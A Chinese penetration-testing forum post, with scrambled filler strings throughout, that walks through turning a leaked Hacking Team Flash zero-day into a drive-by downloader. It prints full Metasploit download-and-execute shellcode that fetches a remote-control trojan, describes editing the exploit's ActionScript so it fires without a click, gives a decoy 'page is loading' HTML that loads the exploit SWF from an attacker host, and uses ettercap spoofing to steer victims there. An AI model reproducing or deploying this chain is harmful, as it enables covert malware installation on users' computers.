中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]
作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

, H1 I+ K- w. }$ H- A4 S 三、flash 0day之手工代码修改制作下载者实例入侵演示 ' ~" ]" B' F% w

1 `! v4 E! S) R" s" U6 B$ D

& _& W' M/ d5 t# Y. E. w 利用到的工具: ! v$ o3 ~, h- `7 t

" D1 x$ e1 }0 M* _

+ e" n3 ?2 F$ _: G: o! a& h0 U Msf 2 m& x* J8 c; o. U) z- r

+ f/ h0 y2 h% B) G& k" f

. T% u$ K- { H/ q7 m3 q! { Ettercap " ]! p; N; v) \) Y6 N/ H9 g

6 B; F( }+ p7 r$ H, ~2 r

) J- h# s& O: i Adobe Flash CS6 : k7 @ X7 o- `1 ^) R8 p# \

0 h+ y/ X; n) D5 W! J, {

- N |9 }" E! h0 v( D; _, I5 v Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ) ~7 F" g& r+ b8 ]3 _* E2 U

6 K9 x9 m0 y4 @6 O* E* @; P r" _. q+ I

4 @$ N/ u3 h5 Q7 ?2 V1 g9 V( ?. j% @ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 5 `+ H5 J3 W; {$ |# [

& |) P3 R2 C& H: }% W2 F/ G/ s

' Z7 D0 w4 j* W4 |$ t7 h 如图: 3 R: @* ]4 f' f7 M3 H( |

# L) r. y7 b% u% g3 b/ Y3 Z. u

6 a8 ^; v$ e$ ]2 z- z. Z   ! P% x+ b; f" [# K M( L

1 ?3 n3 g& ? N: r1 K

% O, H& X4 Y8 Z2 Z   3 D0 a0 F: v. ?* A; o3 r3 Y

9 t5 P! z- C# O' E' r" {5 x# d

6 s; B9 Z& c' d. R 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 1 o, T( U# y7 N$ }! O- P

/ v% g$ f. k! D. Z ?( X

) H3 _1 Z: h$ ~/ s9 x# d' c   r" h! O' d n/ ~9 @3 _

) W. D( z) x( }, n7 s* Y4 ^1 C

6 a/ q/ w, d1 Y! f+ [   1 d6 l V! b( j& N d; U

/ ^4 E; m: d% q, {

- I2 Z0 ?% ?8 X% Q6 m3 I 然后执行generate -t dword生成shellcode,如下: ( Q% j$ @! B! B

8 L( s6 E- m0 I' q! m

V2 ]& e" M$ N) Y   1 ]1 s! s9 R: A4 ]

* ~. G4 r$ N1 \3 u

- Y* a1 L& |+ J( E) A3 f 复制代码到文本下便于我们一会编辑flash exp,如下: : P7 ~( P/ O' r# f" c

- p1 C3 k8 k: A& d9 I

& \8 X1 y" K+ b6 F0 K 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, " H7 i2 J+ n# J. s

" W4 q# b+ C6 R5 I

5 x( ^1 c. {% ?/ N/ o1 M p 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ! L/ o- E5 f; w2 q

o" ~, p. N- Z& D

2 o/ e6 m- c1 o 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ' M* x. Z* \% ^: D; \9 H7 z0 Y

_: f, P8 V% O' @! T3 g% O

- h7 O$ N- y% Y$ z, R 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ! a9 r9 K" b0 U# K# C8 S

3 b& `; _# E/ V5 @+ v1 ?

: y$ M( R3 _4 y( a 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, & I7 S3 u3 r$ W9 G4 X+ i" y

. q1 ^ |0 \) S7 R

9 E5 d9 \, ]' E/ A- z3 O' m6 B 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ( w! W$ g0 ~' J% K& g: \8 r; l

5 T+ q6 e% I. A" N

, i$ n; w/ v# V# T% F: s 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, / X2 h$ u: ?; J3 {

4 j% H2 o( j& s

: H) K4 d1 }/ ]8 ^8 E* ? 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, " y( P* n: _8 R. g. D v

+ u. V2 v2 @1 A- ` _+ j- ^

1 z a' j0 z. `& n! W 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, - Y* f) b8 j- s. N; a

& y6 a' Z4 t5 }; }

/ F% J8 I0 E K) ^& T4 q4 T, k 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, / \4 ]8 J1 ~4 p5 `' u+ x" A

8 F: v, R7 Q% [7 X: ?: g- W

) c0 [8 @+ {* s, O 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, : _0 ~1 S4 Q; m5 N

, K8 g/ G5 t: B2 m( i2 m

- ^, K$ \& D# h) c/ c 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ' n8 V% x0 P+ y9 d. {! ^0 j

& |# ~2 J* G8 t. G$ Q6 A" f2 J- f/ O

4 R' Z# z0 Y3 ~/ C4 M 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, * J1 G; Y5 x0 V4 B) I: V) u9 b1 Z

- ]4 c# C, A5 p

+ q% S+ i- L/ O, h) I 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 4 x+ B2 Y6 g/ `8 t+ n

) _, q6 l3 p4 b% ]: R/ X1 {

# w& ]( q Q/ h6 {! d   # W0 m2 X8 Y$ M3 g5 z2 T2 B

1 Y# D: P6 B: p- i

. n- I6 F8 ~ U- r6 M+ Z# z   . ^, c0 d+ F. u

4 t6 K1 D( m; W8 }% v. c

9 B4 q, x) s) L' S4 O! ` 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ; c4 z6 K8 r0 ^: {# j! y

! V" w- k7 u' B' b1 V

$ v8 Q6 ^! D. l5 q# ~. @   * u. k q9 I1 s, l. f( F

0 a; U$ p; e& {

& f6 ^; n' M- L' \1 B) ?) E( { 先修改ShellWin32.as,部分源代码如图: : y& S2 O0 d& y; {4 r

" @+ C4 |! c5 F; Y8 t& D, P

: e7 y: D) s6 r8 [ T   ; B7 Q- x4 }; d2 K% t

8 g1 @8 i5 [0 H$ ?

& w4 o9 L" g. I0 l5 H: G 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: * D( {% h6 ?" m+ s$ M

4 r) s$ i8 G3 y# i# i3 G

9 E- q6 d& d- P# h% z3 j   - U+ l" @# ]' U5 V) {7 P3 R5 j

0 K# X/ [- ~1 l9 c E: N

. _1 d6 K0 O, p: W: e 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: , d! H) p$ V$ q' i) @2 S$ D/ t6 X4 I: K& _

% d% s, w7 l. R$ D. T% G) f% w

5 m0 d0 @, T1 t, n0 `7 T2 m8 }; A   ' a( b4 @1 s! o3 V# l* K- t3 o- L

) b$ l" T; U, g5 H$ C0 P

3 H- v& }8 n# ?* s% _9 t 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ^3 L5 D4 U& O g5 y+ G8 b$ C

& P$ S+ y" ^/ M" {5 R

" s# b$ b' m! W8 E! a0 ~. }3 E) S   e e" t# H; F0 B, `& z( N. R& R

+ }$ O7 I z5 t/ z! Y: T

% c' N- B: y! y. o7 ?   b. d" l1 w4 x! r m7 L: A

% p% ~4 V0 J" j& u

! d0 A! h8 H4 r9 _# H2 t* L   5 c8 u! D3 r0 q& |) T& q9 j; u

$ {; S! C; m# a3 F0 V+ t

3 _" k+ `4 i% @) `, P 然后点保存,下面我们来编译一下,打开 # C0 `4 Q8 p3 ~. [6 j

) `' {6 A# d! C* ~- u- A, ^7 K

# ^* I8 v( S' W+ Y" p7 x exp1.fla然后点文件-发布,看看编译没错误 1 Q7 Q; a( U" j& W

# v: Z5 i% g+ |) O

0 y. b) J- K' s5 ?9 J   : u1 [9 ]" m3 {2 O

% {% w, a; M: Z5 @4 k. f

& b3 a: t l+ U7 h" I& k, x1 S   / y0 B m" b. N! w* }

- a" X. ?$ ]: E3 P5 H; e3 V6 R, F

6 g# k" ~" o H5 Z/ a   1 Z9 W# I' L5 s- P$ I5 q

5 {) k7 o: h8 l2 q/ Z' @

~; ?( D$ W7 X   # |$ U: P9 }" U* x8 V

$ F0 s% x- ?1 O$ f+ p1 p

4 u9 h( Z( B7 S3 o$ w" A 然后我们把生成的 1 A% [0 {% u" ^# j# O( K

; P' S+ C7 n( V2 n

2 f* K; \7 ^ V exp1.swf丢到kailinux /var/www/html下: 9 g9 L" R N$ g3 X

6 | I; k( j2 `) _4 J2 ~9 Q% |

* _+ C) d/ w' g% b, j$ ` 然后把这段代码好好编辑一下 ! j7 g! v( K2 C# ]2 o( J$ p) [

/ @) [4 ~. g5 j

# o( G( n2 D/ f" M2 w8 _/ w   , D; \& w+ `5 @. C T9 o2 }

6 [* A7 Q- l% T& {+ U6 b

% i% X- K1 K6 q! c5 |( g" ]+ |   $ Z4 b! e8 ]$ n

1 o/ \ P& f# C$ ~

: B9 A9 N* T2 |; y$ I9 t7 q; W   ! h9 f" E% p# x$ b) s- i8 d1 H8 U# n

" k* y0 o: t( f& u5 D

3 N0 ?% b4 D6 A% R% n- I# R   : G" l/ F1 J7 Q7 ], N" {$ J

" R, t. B: O8 U; A- M# p* }

" t- W/ q" \5 p, p4 ~4 D   4 b* i8 Z% E/ ^3 C' c. c( U# D/ s

8 b9 I4 l9 Q' }1 c. E

' t' {& S b( w7 X0 m& a3 J   0 Z3 z5 B, T; O, e3 k& i% x* n9 t

- C- o5 l7 V+ q; [$ O

% \0 m" X& ^' D/ | <!DOCTYPE html> ' _: n* M8 i/ `5 ^; v

$ ]! t1 Y! T/ p

|; t4 |7 @6 R; S9 q4 Z <html> 8 X# z# Q& d m$ \0 G* K! P

2 h: k$ n+ T# F/ ]- J

+ V) c3 F y3 ?- D+ b <head> L& ^0 w( l5 G6 T' R

; U' u6 M' ~* e$ `( R- H

7 a% D* n2 C: Y( \$ S4 Z6 P! ~ <meta http-equiv="Content-Type" content="text/html; / F7 W. z" Z: r$ {& _/ N& ?+ M

; h' V' I( L% I) x. g

( x3 G0 y5 p' W1 E& k/ } charset=utf-8"/> 8 `6 X, u8 {2 u, d$ k2 K+ f

, d8 x3 I2 p5 T, j7 Q2 U& f0 V

$ L% Q9 m- S1 i( J" u& [9 b </head> , o( s& D. g' e5 m2 R

' l4 t% T8 p. p' P: M2 \

6 b8 \' W6 M: H <body> . w1 e. z4 U$ Y

0 D9 v* R$ i* q& p

0 K) g* V ~ w' V9 V% _0 F <h2> Please wait, the requested page is loading...</h2> 1 L7 e4 D2 c! H. r V% d0 b# q2 d1 t

# c1 D! k: _9 X/ {. }. J( B$ V% u

" }' N" Y# F3 b+ x0 i* g <br> * a2 i5 o" x' \- q/ h

8 y5 `9 Y3 E2 p; d- Q3 M% ]4 v# |# c

. L& t; t. S4 ` <OBJECT ' V8 p- C, G$ R! i! \! [- o# g# X

$ {* s- ^6 t9 F0 Z. z( |

1 y* G5 ^: F0 ~+ V( S6 u classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 3 o" [' X7 ^" A) Z, |' \

( Q) v0 ?5 ~: B8 z) T

. ^4 E% g1 n" J VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) }4 o0 A! I [$ T# V1 w0 _

9 h& a$ Q: i8 r% j3 X: ~2 O0 W

4 o. k, S- R6 N; w8 m </body> * k9 {* ~+ P4 g6 q! [! h

4 [) J6 a! }; n' X O( Q$ a

5 ?( x5 \/ u" q) A$ d <script> . u( q' ~1 E; ~5 _6 t

. v3 H1 k( B& M- B

& t% R: O, F" z/ p ]     setTimeout(function () { 2 r5 f% Q2 I5 w1 ]5 ~' t# u% k7 ?

5 y! I9 N* f1 j3 ~

7 M1 ?! g0 R6 d7 \          6 D" u7 Z) N9 x# S

0 ]3 v. z9 H) }

7 B5 P. C7 Q% H* M window.location.reload(); 1 N% F! \' | ]

, {. E6 l* a2 X# z% Y5 a

( B! w" Z- M; o4 o" z m     }, 10000); : r* ^ D( d5 k% O# I

/ V2 m# G' \7 p0 ~1 m6 s

" r; {7 G5 L/ b   : t+ `! S; G/ \. k, `( h/ W; j

, L4 C8 C5 T, q5 k) Y+ @, e, p' D4 T

! s( q% O8 l) R! A3 B </script> 6 q5 V7 C) h) _2 L* r) Y

' o2 x' O! ~. I# V6 [8 x; P

/ y+ Z' P4 l2 B$ [ </html> ( N+ W0 g. u2 a J4 K: Y% \

' \/ }# r' r" Y1 n8 S2 E+ \8 T& X

5 D7 Y% Y p: m' P. }5 O. U: c   % P, o% E' Q! V# p

0 [* \- G) b4 R. l: q& I

* u2 T; h+ @1 w8 G6 e) ]2 U 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: " ^- I2 w- C& D$ E! H2 N5 k

+ K5 Q4 Q3 T3 j5 s% v

/ P& c- _0 _* r: v   " @8 c& v$ L: ^6 a( T9 |

' Q' s# u% w5 ?' {* Q4 {1 p

4 p |7 I& J; u4 \0 g0 t   ! t7 ?* P& g8 M6 L/ }

" v( T7 [6 N/ C0 ? C* z% J. G; _

: x6 \5 R( \/ @' M2 a1 t   3 y8 G9 S, n6 r0 T o( c) h* E

8 @0 K$ r/ |! D

% Y) x9 Q" \& \8 v4 R   * r. K: n, Y! o+ i

+ ~% `) q5 f9 U0 k" Y. Q% O

6 Q. ?+ O. C. b5 r& s8 g( t1 V   1 S, e5 ~! B* K" }( B' W) b

' y1 o$ H* v, i" Y2 H. W1 J

, H: X2 c' K% R$ w 下面我们用ettercap欺骗如图: # `$ @+ {$ ?! p+ U o5 ^

3 s, }$ ?3 C c' B9 N9 P0 Q' w3 Y

1 Y2 ]/ s7 P7 H( n- a5 s0 r s   2 C4 A0 I9 m2 h2 s5 t$ l6 s

' [/ }1 @' C- I& I! i" Y, d6 b$ W

8 \" b. |3 g0 i N   - h8 w; ?: n7 f

* B2 d: {3 \% Q/ d6 l

/ l5 k {/ V3 \2 v* G4 K 下面我们随便访问个网站看看: 4 X( H4 X0 T$ e2 O

4 y/ H8 t4 E" j0 _6 E, z( _

. H h% u5 M4 a" p, s M 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: : y0 ?. }9 M4 r6 f" e

6 o. r2 e! z# y4 h" j- Q: ~

- n" Y# h5 t1 U7 `, [! ~' E" q; N   $ o: o& p- U- N" i, R% x7 S

4 P& Q7 ?/ i! a& m) B7 a! w8 n. ]

# I r9 o7 A: q7 E 我们看另一台, 6 w' [1 Y6 _5 _* n/ e, C* j

* J! F: d2 x: @

7 x z/ @% h- e4 G& @ 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 & ^- z1 [0 Z: [8 T





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2